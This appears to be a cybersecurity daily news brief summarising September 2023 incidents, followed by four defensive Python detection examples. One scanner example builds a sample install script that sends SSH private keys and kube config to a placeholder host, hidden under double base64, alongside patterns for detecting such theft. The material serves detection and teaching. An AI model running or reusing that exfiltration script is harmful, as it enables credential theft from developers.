Daily Brief
Find articles below, see 'DETAILS' for generated summaries
| Date | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2023-09-28 13:54:39 | bleepingcomputer | CYBERCRIME | Budworm Hackers Deploy Custom Malware Against Middle Eastern Telecoms and Asian Government Entities | Budworm, a China-linked hacking group, has been observed targeting a telecommunications firm in the Middle East and a government entity in Asia with its custom malware, SysUpdate.
SysUpdate is a remote access trojan that provides process management, file retrieval, screenshot capture, and command execution.
The newest variant of the backdoor was detected in August 2023 and is launched via DLL sideloading, a technique chosen to slip past security tools on the target host.
The attackers also use several publicly available tools for credential dumping, network mapping, and data theft.
The incident fits a recurring pattern of telecom companies being targeted by state-sponsored APT groups.
Budworm has been active since 2013, conducting espionage operations against sectors such as government, technology, and defense.
Previous Budworm activity includes supply chain attacks in Germany, attacks on several online gaming and gambling companies, and intrusions at multiple ministries in Belgium. | Details |
| 2023-09-28 13:51:04 | thehackernews | NATION STATE ACTIVITY | State-backed Chinese Hacking Group, BlackTech, Targets US and Japanese Companies via Router Exploits | BlackTech, a hacking group linked to the Chinese government, has been compromising routers to attack US and Japanese companies. The group modifies router firmware and pivots from the networks of international subsidiaries into corporate headquarters, focusing primarily on targets in Japan and the United States.
The joint advisory describing BlackTech was issued by the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Japan National Police Agency (NPA), and the Japan National Center of Incident Readiness and Strategy for Cybersecurity (NISC).
The sectors targeted include government and military organizations, as well as technology, media, electronics, telecommunications and other industries in the US and Japan.
Since 2007, BlackTech has conducted covert operations against targets in East Asia and has shown the ability to operate undetected for long periods. The group uses custom backdoors for a range of attacks and is known for repurposing compromised routers as command-and-control (C&C) servers.
BlackTech's typical initial access is a spear-phishing email with a malicious attachment that deploys malware designed to extract sensitive data.
The group also uses evasion techniques such as signing malware with stolen code-signing certificates and living-off-the-land (LotL) tradecraft to sustain long-term, stealthy operations.
To counter these threats, organizations are advised to monitor network devices for unauthorized downloads of bootloaders and firmware images, and to detect and investigate anomalous traffic to and from routers. | Details |
| 2023-09-28 11:18:46 | theregister | DATA BREACH | Google Works on Fix as Chatbot Bard's Conversations Indexed in Search Results | Google's chatbot, Bard, gained the ability in July to share conversations via unique public links, and Google Search has since indexed those links, making shared chats readily discoverable.
Google says users can delete shared links and that they expire automatically after six months, but copies already indexed remain discoverable in its own search service in the meantime.
Although the indexed chats seen so far did not contain personal information, users may not realise that anything they share by link can surface in Google Search results.
This new concern with Bard adds to Google's series of previous privacy issues, including settlements over biometrics, location data, and tracking claims.
Google acknowledged that shared Bard chats were never intended to be indexed and said it is working to block them from appearing in Search. | Details |
| 2023-09-28 11:18:45 | thehackernews | NATION STATE ACTIVITY | China-Linked Budworm Launches Improved Malware Attacks on Asian Government and Middle Eastern Telco | The China-linked Budworm threat group has launched new attacks on a Middle Eastern telecom company and an Asian government using an updated version of its SysUpdate malware.
The group, also tracked as APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, has been active since 2013 and focuses on intelligence gathering across a range of industries.
Budworm's toolset includes the China Chopper web shell, Gh0st RAT, HyperBro, PlugX, SysUpdate, and ZXShell, and the group is known to exploit vulnerable internet-facing services to gain access to target networks.
Trend Micro has previously detailed a Linux version of SysUpdate, including its measures to bypass security controls and resist reverse engineering. Its features include screenshot capture, arbitrary process termination, file operations, drive information retrieval, and command execution.
Despite the malware's capabilities, Symantec suggests the intrusion may have been stopped early in the attack chain, since only credential harvesting was observed on the infected machines.
Symantec also noted that Budworm continues to develop SysUpdate to extend its capabilities and evade detection, and that it still relies on DLL side-loading via applications it has abused before; reusing known malware in this way suggests the group is confident it can operate despite the detection and attribution risk. | Details |
| 2023-09-28 11:18:45 | thehackernews | CYBERCRIME | Limitations of Browser Isolation Highlight Need for Advanced Cybersecurity Approaches | Traditional browser isolation, once considered an excellent method to ward off malware and browser exploits, is no longer seen as secure enough, especially in a software as a service (SaaS) dominated ecosystem.
The approach's weaknesses include its impact on browser performance and inability to fend off newer web threats like phishing and harmful extensions.
Historically, browser isolation allowed unknown code to execute in a separate environment, not directly on the endpoint, protecting devices and users against potentially malicious code.
The shift to a more browser and SaaS-dependent workspace has amplified the negative impact of traditional browser isolation on the performance of web tools and services.
Evolving web threats and their changing nature have outpaced browser isolation techniques, causing a security gap.
The next generation of browser security is turning towards secure browser extensions, which can integrate seamlessly into existing browsers, monitor and analyse web page components, and effectively neutralize threats with minimal impact on performance. | Details |
| 2023-09-28 04:00:57 | theregister | NATION STATE ACTIVITY | Chinese National Security Minister Rates Fake News and Cyberattacks as Pressing Threats | Minister for National Security of China, Chen Yixin, has identified network security incidents, including the spread of fake news and cyberattacks, as the most significant digital threats to China.
In an article for China Cyberspace, the official magazine of the Cyberspace Administration of China, Chen also named international competition in cyberspace as a key challenge for China.
Chen took issue with foreign technology alliances allegedly aimed at excluding China, accusing them of being motivated by intentions to monopolize technology leadership rather than genuine security concerns.
Chen noted China's technological weakness lies in the control exerted by other nations over core technologies and stated that China cannot yet match the quality of offshore tech providers.
Cyberattacks on Chinese infrastructure and theft of data from government and scientific research institutions were cited as additional threats to the nation's security.
Moving forward, Chen advocated following party lines, making progress in sectors such as quantum computing, and improving IT governance and security to confront these challenges.
These comments coincide with China's continued emphasis on boosting its digital capabilities and improving controls over online activities. | Details |
| 2023-09-28 03:14:21 | thehackernews | CYBERCRIME | Google Releases Patch for Actively Exploited Zero-Day Vulnerability | Google has rolled out fixes for a high-severity, actively exploited zero-day vulnerability (CVE-2023-5217) in the Chrome browser. The flaw can cause crashes or allow arbitrary code execution.
The bug, reported by Clément Lecigne of Google's Threat Analysis Group, resides in libvpx, an open-source video codec library, and is a heap-based buffer overflow in its VP8 encoder.
The bug has reportedly been exploited by a commercial spyware vendor against high-risk individuals.
The fix brings the number of Chrome zero-days patched this year to five.
Separately, Google issued a new CVE identifier (CVE-2023-5129) for a critical flaw in the libwebp image library that is under active exploitation; that identifier was subsequently rejected as a duplicate of the existing libwebp CVE (CVE-2023-4863), so the libwebp bug should be tracked under the earlier ID.
Users of Chrome and Chromium-based browsers, including Microsoft Edge, Brave, Opera, and Vivaldi, are advised to update to the latest versions to mitigate the threat. | Details |
| 2023-09-27 22:15:44 | bleepingcomputer | CYBERCRIME | Google Patches Actively Exploited Chrome Zero-Day Vulnerability for Fifth Time in 2023 | Google has patched CVE-2023-5217, the fifth Chrome zero-day found exploited in attacks since the start of the year. The fix is rolling out to users globally.
The high-severity vulnerability is a heap buffer overflow in the VP8 encoder of the open-source libvpx video codec library, and can lead to crashes or arbitrary code execution.
The bug was reported by Google's Threat Analysis Group (TAG), whose researchers frequently uncover zero-day exploits used in targeted spyware attacks, including those by state-sponsored groups.
Google confirmed that an exploit for CVE-2023-5217 has been used in attacks but has not disclosed further details about the incidents.
Google restricts access to bug details until the majority of users have updated, and keeps those restrictions in place for bugs in third-party libraries that other projects depend on but have not yet fixed.
Withholding technical details in this way is meant to narrow the window in which other threat actors can develop their own exploits and deploy them in the wild. | Details |
| 2023-09-27 21:50:36 | bleepingcomputer | CYBERCRIME | Malicious PyPI and npm Packages Steal SSH Keys and Sensitive User Data | Malicious PyPI and npm packages have been systematically stealing developers' sensitive data since September 12, 2023.
Sonatype first identified the campaign through 14 malicious packages on npm; Phylum later reported that it had expanded to PyPI.
To date the attackers have run roughly seven waves and uploaded 45 malicious packages across npm and PyPI, with the packages changing rapidly between waves for stealth and more specific targeting.
Middle and later waves introduced more complex collection mechanisms, such as retrieving and executing a data-collecting bash script from an external domain, and wrapping the payload in base64 encoding, later double base64 encoding, to hinder analysis.
Stolen data includes the hostname, username, current path, OS version, external and internal IP addresses, and (for the PyPI packages) the Python version, as well as Kubernetes configuration files and SSH private keys.
The stolen data could expose developer identities, give attackers access to systems, and enable modification of deployments, insertion of malicious containers, and ultimately ransomware attacks.
Users of PyPI and npm are urged to exercise caution when installing and running packages, given the constant influx of malware into both registries. | Details |
| 2023-09-27 21:10:07 | bleepingcomputer | MALWARE | Typosquatted Bitwarden Sites Used to Distribute ZenRAT Malware | Cybercriminals are using fake Bitwarden websites to distribute a new password-stealing malware known as ZenRAT.
Users are tricked into downloading counterfeit installers of the Bitwarden open-source password manager, which deliver the malware.
ZenRAT steals browser data and saved login credentials and builds a detailed fingerprint of the infected host; a stolen fingerprint lets attackers make later logins with the stolen credentials look like they come from the legitimate user's system.
The malware appears to target Windows users specifically; visitors on other operating systems are redirected to an opensource.com article about the password manager.
Proofpoint discovered ZenRAT after receiving a malware sample from Jérôme Segura, senior director of threat intelligence at Malwarebytes.
Once active, ZenRAT collects data about the host system to create a detailed profile, then sends these details along with the stolen data to its command-and-control server.
Although ZenRAT currently functions as an information stealer, Proofpoint suggests it is designed to be modular, with the possibility of expanded capabilities. No additional modules have yet been found in the wild. | Details |
| 2023-09-27 19:51:18 | bleepingcomputer | CYBERCRIME | Johnson Controls and Its Subsidiaries Impacted by Dark Angels Ransomware Attack | Johnson Controls, a multinational provider of industrial control systems, security equipment, air conditioners, and fire safety equipment, has suffered a major ransomware attack that encrypted company devices and disrupted operations.
The breach began in the company's Asia offices and spread over the weekend, prompting an IT system shutdown and website outages; subsidiaries York, Simplex, and Ruskin began displaying technical-outage notices.
The attack has been attributed to the Dark Angels ransomware gang, which reportedly used its VMware ESXi encryptor and left a ransom note demanding $51 million for a decryptor and the deletion of stolen data.
The attackers claim to have exfiltrated over 27 TB of corporate data and encrypted Johnson Controls' VMware ESXi virtual machines during the attack.
Dark Angels, active since May 2022, breaches networks and steals data for double-extortion attacks, deploying its ransomware once it controls a Windows domain controller.
Dark Angels runs a data leak site called 'Dunghill Leaks' to pressure victims, threatening to publish stolen data if the ransom is not paid; nine victims are currently listed, including Sabre and Sysco, both of which recently reported cyberattacks. | Details |
| 2023-09-27 16:33:20 | theregister | MISCELLANEOUS | NYC Rights Groups Advocate for Bans on Public and Residential Use of Biometric Tech | More than 30 civil and digital rights organizations have expressed their support for two pending New York state bills – 1014-2023 and 1024-2023 – aimed at banning facial recognition and other biometric tech in public spaces and residential buildings.
Groups supporting the legislation include the New York Civil Liberties Union, the Surveillance Technology Oversight Project, and Amnesty International. They have criticized such technology for being biased, error-prone, and detrimental to marginalized communities.
Bill 1014-2023 seeks to prohibit public places and providers from using biometric recognition to verify or identify customers and bars businesses from refusing entry based on facial recognition tech (FRT). It also prevents companies from selling customers' biometric data.
Bill 1024-2023 focuses on the use of facial recognition and other biometric surveillance in residential settings. Concerns have been raised about landlords using the tech to monitor residents and potentially evict them if the system perceives they were not at home often enough.
Advocates cite the incident of lawyer Kelly Conlon, who was turned away by a facial recognition system at Radio City Music Hall. Critics of facial recognition say the technology is often inaccurate, with particular biases against women and people of color.
Elsewhere, Clearview AI was forced to stop selling facial recognition databases to most U.S. businesses after a lawsuit settlement with the ACLU, while the company was also fined in the U.K. for data scraping.
The European Parliament has adopted its position on the draft EU AI Act, which includes a ban on the use of AI for biometric surveillance, emotion recognition, and predictive policing. | Details |
| 2023-09-27 15:52:35 | bleepingcomputer | NATION STATE ACTIVITY | US and Japan Warn of Chinese BlackTech Hackers Targeting Cisco Routers | US and Japanese cybersecurity agencies have issued a joint warning about the Chinese 'BlackTech' hacking group, which breaches network devices to install backdoors and gain access to corporate networks.
BlackTech, also tracked as Palmerworm, Circuit Panda, and Radio Panda, is a Chinese state-sponsored advanced persistent threat group that has conducted cyber-espionage against Japanese, Taiwanese, and Hong Kong entities since at least 2010.
The sectors it targets primarily include government agencies, industrial organizations, technology companies, media, electronics, telecommunications, and the defense industry.
The group uses custom malware to backdoor network devices and steals data by redirecting traffic to servers it controls; it leverages stolen administrator credentials to compromise a range of router brands and models and establish persistence.
The compromised devices, including Cisco routers, are then used to proxy traffic, blend in with legitimate corporate network traffic, and pivot to other victims on the same network.
BlackTech also modifies router firmware to hide its activity on the edge devices and maintain persistence, and disables logging on a compromised device while carrying out malicious operations so that configuration changes and command history are not recorded.
System administrators are advised to monitor for unauthorized downloads of firmware images and unusual device reboots, and to treat unexpected SSH traffic to or from routers as suspicious.
Network administrators are also encouraged to install security patches on edge devices as soon as they become available and to avoid exposing management interfaces to the internet. | Details |
| 2023-09-27 14:44:13 | thehackernews | MALWARE | AtlasCross Threat Actor Uses Red Cross-Themed Phishing Lures to Distribute New Backdoors | A new threat actor known as AtlasCross has been discovered using Red Cross-themed phishing lures to deliver two previously unknown backdoors, DangerAds and AtlasAgent.
The attack begins with a macro-enabled Microsoft Office document about a fictional blood donation drive by the American Red Cross. When the document is opened, the malicious macro establishes persistence and exfiltrates system metadata to a remote server.
The macro also downloads DangerAds, a loader that launches shellcode which in turn deploys AtlasAgent, a backdoor capable of collecting system information, running shellcode, and executing commands.
Both AtlasAgent and DangerAds have evasive features built-in to avoid detection by security tools.
AtlasCross is also suspected of exploiting known security vulnerabilities to gain control of public network hosts and convert them into command-and-control (C2) servers.
Though AtlasCross currently operates with a limited scope of activity, their attack methods are robust and sophisticated, indicating the possibility of more extensive and damaging attacks in the future. | Details |
| 2023-09-27 14:09:36 | bleepingcomputer | CYBERCRIME | Researchers Unveil New "GPU.zip" Side-Channel Attack Exploiting Unpatched GPU Vulnerability | Researchers from four US universities have disclosed a novel side-channel attack, 'GPU.zip', that exploits data-dependent compression in modern graphics processors to extract sensitive visual data while a user browses the web.
The method was demonstrated in the Chrome browser using cross-origin SVG filter pixel-stealing attacks against content loaded in an iframe.
GPU vendors including AMD, Apple, NVIDIA, and Qualcomm were notified of the issue in March 2023; as of September 2023 no patches have been issued.
Modern GPUs, notably integrated Intel and AMD chips, apply data compression whose timing effects are visible to software even when the application did not request compression, and this is the leakage the GPU.zip attack exploits.
According to the researchers, GPU.zip can steal usernames from a Wikipedia iframe in about 215 minutes on Intel GPUs with 98.3% accuracy.
The lack of vendor response and the ubiquity of affected GPUs imply significant potential risk, but the attack's complexity and time requirements limit the immediate threat to users.
The researchers also note that the attack does not work in browsers such as Firefox and Safari that do not satisfy its prerequisites, and that it requires the victim page to be embeddable in a cross-origin iframe, so sites that forbid framing (via X-Frame-Options or a CSP frame-ancestors directive) are not exposed. | Details |
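The two BlackTech items above list what to watch for on routers: image downloads, logging being switched off, configuration and SSH logins from unexpected sources, and unexplained reloads. The following script is an added example (not code from the advisory, CISA, or either article) that applies those rules to router syslog. The log lines are constructed for illustration and follow Cisco IOS syslog message formats; the management subnet 10.10.0.0/24 and the hostname edge-rtr-1 are assumptions.

```python
"""Flag the router syslog events the BlackTech advisory tells defenders to watch
for: image downloads, logging being switched off, logins and configuration from
outside the management network, and reloads.

Added example, not code from the advisory or the articles. Log lines are
constructed and follow Cisco IOS syslog message formats; the management subnet
is an assumption.
"""
from __future__ import annotations

import ipaddress
import re
from dataclasses import dataclass

# Assumption: only hosts in this subnet are allowed to manage the routers.
MGMT_NET = ipaddress.ip_network("10.10.0.0/24")

# Constructed sample log (not from any real incident). The first line is benign.
SAMPLE_LOGS = """\
<189>Sep 27 10:01:12 edge-rtr-1 %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 10.10.0.5] [localport: 22] at 10:01:12 UTC
<189>Sep 27 10:05:44 edge-rtr-1 %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 203.0.113.77] [localport: 22] at 10:05:44 UTC
<189>Sep 27 10:06:02 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:copy tftp://203.0.113.77/ios-image.bin bootflash:
<189>Sep 27 10:06:30 edge-rtr-1 %SYS-5-CONFIG_I: Configured from console by admin on vty1 (203.0.113.77)
<189>Sep 27 10:06:41 edge-rtr-1 %PARSER-5-CFGLOG_LOGGEDCMD: User:admin  logged command:no logging buffered
<189>Sep 27 10:07:15 edge-rtr-1 %SYS-5-RELOAD: Reload requested by admin on vty1 (203.0.113.77). Reload Reason: Reload Command.
<189>Sep 27 10:09:48 edge-rtr-1 %SYS-5-RESTART: System restarted -- Cisco IOS Software
"""

HOST_RE = re.compile(r"^(?:<\d+>)?\w{3} +\d+ \d\d:\d\d:\d\d (\S+) ")
LOGIN_RE = re.compile(r"%SEC_LOGIN-5-LOGIN_SUCCESS:.*\[Source: ([\d.]+)\]")
CONFIG_RE = re.compile(r"%SYS-5-CONFIG_I: Configured from \S+ by (\S+) on (\S+) \(([\d.]+)\)")
CMD_RE = re.compile(r"%PARSER-5-CFGLOG_LOGGEDCMD: User:(\S+) +logged command:(.*)$")
REMOTE_SRC_RE = re.compile(r"\b(tftp|ftp|https?|scp|sftp)://")


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def outside_mgmt(ip: str) -> bool:
    return ipaddress.ip_address(ip) not in MGMT_NET


def analyse(log_text: str) -> list[Finding]:
    """Apply the advisory's watch-list rules to each syslog line."""
    findings: list[Finding] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = HOST_RE.match(line)
        host = m.group(1) if m else "?"
        if (m := LOGIN_RE.search(line)) and outside_mgmt(m.group(1)):
            findings.append(Finding(host, "login-from-non-mgmt", m.group(1)))
        elif (m := CONFIG_RE.search(line)) and outside_mgmt(m.group(3)):
            findings.append(Finding(host, "config-from-non-mgmt", f"{m.group(1)}@{m.group(3)}"))
        elif m := CMD_RE.search(line):
            cmd = m.group(2).strip()
            # copy from a remote source into flash = candidate firmware replacement
            if cmd.startswith("copy ") and REMOTE_SRC_RE.search(cmd) and "flash:" in cmd:
                findings.append(Finding(host, "image-download", cmd))
            # turning logging or accounting off is how BlackTech hides its commands
            elif re.match(r"no (logging|aaa accounting|archive)\b", cmd):
                findings.append(Finding(host, "logging-disabled", cmd))
        elif "%SYS-5-RELOAD:" in line or "%SYS-5-RESTART:" in line:
            # every reload is worth a ticket; correlate with the change calendar
            findings.append(Finding(host, "reload", line.split(": ", 1)[1]))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_LOGS):
        print(f"{f.host:12} {f.rule:22} {f.detail}")
```

The command-log lines (%PARSER-5-CFGLOG_LOGGEDCMD) only exist if the router has `archive log config` with logging enabled, so the "logging-disabled" rule depends on that being configured and on syslog being shipped off-box before the attacker can switch it off; a sudden silence from a device that normally logs is itself a signal worth a separate rule.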
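The Bard item above is about share links that should never have been indexed, and the GPU.zip item notes that the attack needs the victim page inside a cross-origin iframe. Both are response-header policy. The following WSGI middleware is an added example (not code from Google or from the GPU.zip researchers) that serves `X-Robots-Tag: noindex` on public-by-link share pages and `frame-ancestors 'none'` on pages that render per-user data. The URL layout (/share/<id>, /account/, /chat/) is an assumption.

```python
"""Response-header policy covering two items above: keep public-by-link share
pages out of search indexes (the Bard item), and refuse cross-origin framing of
pages that render per-user content, which removes the iframe the GPU.zip
pixel-stealing attack needs.

Added example, not code from Google or from the GPU.zip researchers. The URL
layout (/share/<id> pages and /account/ and /chat/ pages) is an assumption.
"""
from __future__ import annotations

import wsgiref.util

SHARE_PREFIX = "/share/"                    # public-by-link, must not be indexed
PRIVATE_PREFIXES = ("/account/", "/chat/")  # show the logged-in user's data


def policy_headers(path: str) -> dict[str, str]:
    """Headers to add for a given request path."""
    headers = {}
    if path.startswith(SHARE_PREFIX):
        # Served on a crawlable page on purpose: a robots.txt Disallow would stop
        # the crawler from ever seeing this header, and the URL could still be listed.
        headers["X-Robots-Tag"] = "noindex, nofollow, noarchive"
        headers["Referrer-Policy"] = "no-referrer"  # don't leak the share URL outbound
    if any(path.startswith(p) for p in PRIVATE_PREFIXES):
        # No site may embed these pages, so an attacker page cannot draw them
        # through SVG filters. X-Frame-Options is kept for older browsers.
        headers["Content-Security-Policy"] = "frame-ancestors 'none'"
        headers["X-Frame-Options"] = "DENY"
    return headers


def harden(app):
    """WSGI middleware that appends the policy headers unless the app set them."""
    def wrapped(environ, start_response):
        extra = policy_headers(environ.get("PATH_INFO", "/"))

        def start(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            merged = list(headers) + [(k, v) for k, v in extra.items() if k.lower() not in present]
            return start_response(status, merged, exc_info)

        return app(environ, start)
    return wrapped


def demo_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
    return [b"<html><body>demo</body></html>"]


def response_headers(app, path: str) -> dict[str, str]:
    """Run one request through a WSGI app offline and return its headers."""
    environ = {}
    wsgiref.util.setup_testing_defaults(environ)
    environ["PATH_INFO"] = path
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = dict(headers)

    b"".join(app(environ, start_response))
    return captured["headers"]


if __name__ == "__main__":
    for p in ("/", "/share/abc123", "/account/settings"):
        print(p, response_headers(harden(demo_app), p))
```

The noindex header is only honoured if the crawler can fetch the page, which is why the share path is deliberately not blocked in robots.txt; and `frame-ancestors 'none'` is the strongest setting, so a product that legitimately embeds its own pages should list its own origins instead of 'none'.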
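The npm/PyPI item above describes install scripts that wrap a data-collecting bash script in one, then two, layers of base64 and harvest SSH keys, kube config and host details. The scanner below is an added example (not code from Sonatype or Phylum): it peels nested base64 literals out of a package's install script and runs the reported indicators over the decoded payload. The SAMPLE_SETUP_PY body is constructed for illustration and is not one of the malicious packages; the collector URL is a placeholder.

```python
"""Unwrap layered base64 in a package install script and look for the data-theft
indicators reported for the npm/PyPI campaign above (SSH keys, kube config,
host recon, external IP lookup, handing a fetched script to a shell).

Added example, not code from Sonatype or Phylum. SAMPLE_SETUP_PY is constructed
for illustration and is not one of the malicious packages; the collector URL is
a placeholder.
"""
import base64
import binascii
import re

B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"]+")

INDICATORS = {
    "ssh-private-key": re.compile(r"\.ssh/(id_[a-z0-9]+|identity)(?!\.pub)"),
    "kube-config": re.compile(r"\.kube/config"),
    "host-recon": re.compile(r"\b(hostname|whoami|uname)\b|socket\.gethostname|getpass\.getuser"),
    "ip-lookup": re.compile(r"ifconfig\.me|ipinfo\.io|api\.ipify\.org|checkip"),
    "shell-exec": re.compile(r"\|\s*(ba)?sh\b|subprocess\.(run|Popen|call)\(.*\b(ba)?sh\b|os\.system\("),
}


def peel_base64(blob: str, max_depth: int = 5) -> tuple:
    """Repeatedly base64-decode until the result is no longer base64 text.
    Returns (innermost_text, layers_removed); (blob, 0) if blob was not base64."""
    text, depth = blob.strip(), 0
    while depth < max_depth:
        try:
            decoded = base64.b64decode(text, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            break
        text, depth = decoded.strip(), depth + 1
        if not re.fullmatch(r"[A-Za-z0-9+/=]+", text):
            break  # reached something that is not another base64 layer
    return text, depth


def scan_source(source: str) -> dict:
    """Peel every base64 literal, then run the indicator patterns over the source
    plus all decoded payloads."""
    payloads = []
    for literal in B64_LITERAL.findall(source):
        text, layers = peel_base64(literal)
        if layers:  # decoded to text; a hex digest decodes to bytes and is skipped
            payloads.append({"layers": layers, "text": text})
    corpus = source + "\n" + "\n".join(p["text"] for p in payloads)
    return {
        "max_layers": max((p["layers"] for p in payloads), default=0),
        "hits": sorted(name for name, rx in INDICATORS.items() if rx.search(corpus)),
        "urls": sorted(set(URL_RE.findall(corpus))),
        "payloads": payloads,
    }


# Constructed sample: the inner script does what the articles describe, and is
# wrapped in two base64 layers like the campaign's later waves.
INNER_SCRIPT = (
    "H=$(hostname); U=$(whoami); IP=$(curl -s ifconfig.me)\n"
    "tar cz ~/.ssh/id_rsa ~/.kube/config 2>/dev/null | "
    "curl -s -X POST --data-binary @- \"https://collector.example/up?h=$H\"\n"
)
_twice = base64.b64encode(base64.b64encode(INNER_SCRIPT.encode())).decode()
SAMPLE_SETUP_PY = f'''import base64, subprocess
payload = "{_twice}"
script = base64.b64decode(base64.b64decode(payload)).decode()
subprocess.run(["bash", "-c", script])
'''

if __name__ == "__main__":
    report = scan_source(SAMPLE_SETUP_PY)
    print(f"layers: {report['max_layers']}  hits: {report['hits']}  urls: {report['urls']}")
```

The indicators are deliberately run over the source and the decoded payloads together, because the campaign split its tells between the two: the shell hand-off sits in the visible Python while the paths and the collector URL only appear after the layers are removed.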
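The ZenRAT item above turns on typosquatted Bitwarden domains. The following is an added example (not code from Proofpoint) of the classifier a brand-protection or mail-filter pipeline runs over newly seen hostnames: it folds common lookalike characters, strips accents, and compares the registrable label to the brand by edit distance. The candidate domains are constructed and are not the lure domains from the campaign; the eTLD+1 helper is naive and a public-suffix list is assumed for real use.

```python
"""Score hostnames for lookalikes of a protected brand, the kind of typosquatted
site the ZenRAT item describes.

Added example, not code from Proofpoint. The candidate domains are constructed
and are not the lure domains from the campaign; the eTLD+1 helper is naive
(a public-suffix list is an assumption for real use).
"""
from __future__ import annotations

import unicodedata

BRANDS = {"bitwarden": "bitwarden.com"}  # brand -> its only legitimate registrable domain

# Single-character lookalikes folded before comparison (digits, dotless i,
# Greek omicron, Latin alpha).
CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
                             "\u0131": "i", "\u03bf": "o", "\u0251": "a"})


def normalise(label: str) -> str:
    s = label.lower().translate(CONFUSABLES)
    s = unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode()  # strip accents
    return s.replace("-", "").replace("vv", "w").replace("rn", "m")


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Naive eTLD+1: the last two labels (assumption; use a public-suffix list)."""
    return ".".join(host.lower().strip(".").split(".")[-2:])


def classify(host: str, max_distance: int = 2) -> tuple:
    """Return (verdict, brand, distance) for a hostname."""
    reg = registrable(host)
    sld_norm = normalise(reg.split(".")[0])
    for brand, legit in BRANDS.items():
        if reg == legit:
            return ("legitimate", brand, 0)
        d = levenshtein(sld_norm, normalise(brand))
        if d <= max_distance:
            return ("typosquat", brand, d)  # distance 0 = homoglyph or TLD swap
        if normalise(brand) in sld_norm:
            return ("brand-in-name", brand, d)  # e.g. bitwarden-app.example
    return ("unrelated", None, None)


# Constructed candidates; accented and doubled-v forms show the normaliser at work.
CANDIDATES = ["vault.bitwarden.com", "bitwardem.com", "b\u00edtwarden.co",
              "bitvvarden.com", "bitwarden-app.com", "github.com"]

if __name__ == "__main__":
    for h in CANDIDATES:
        print(f"{h:22} {classify(h)}")
```

Distance 0 against a non-legitimate registrable domain is the most interesting bucket: it catches both the TLD swap and the homoglyph (the accented or doubled-v spellings above), which an eye scanning a URL bar will miss; the "brand-in-name" bucket is noisier and is better fed to a reviewer than blocked outright.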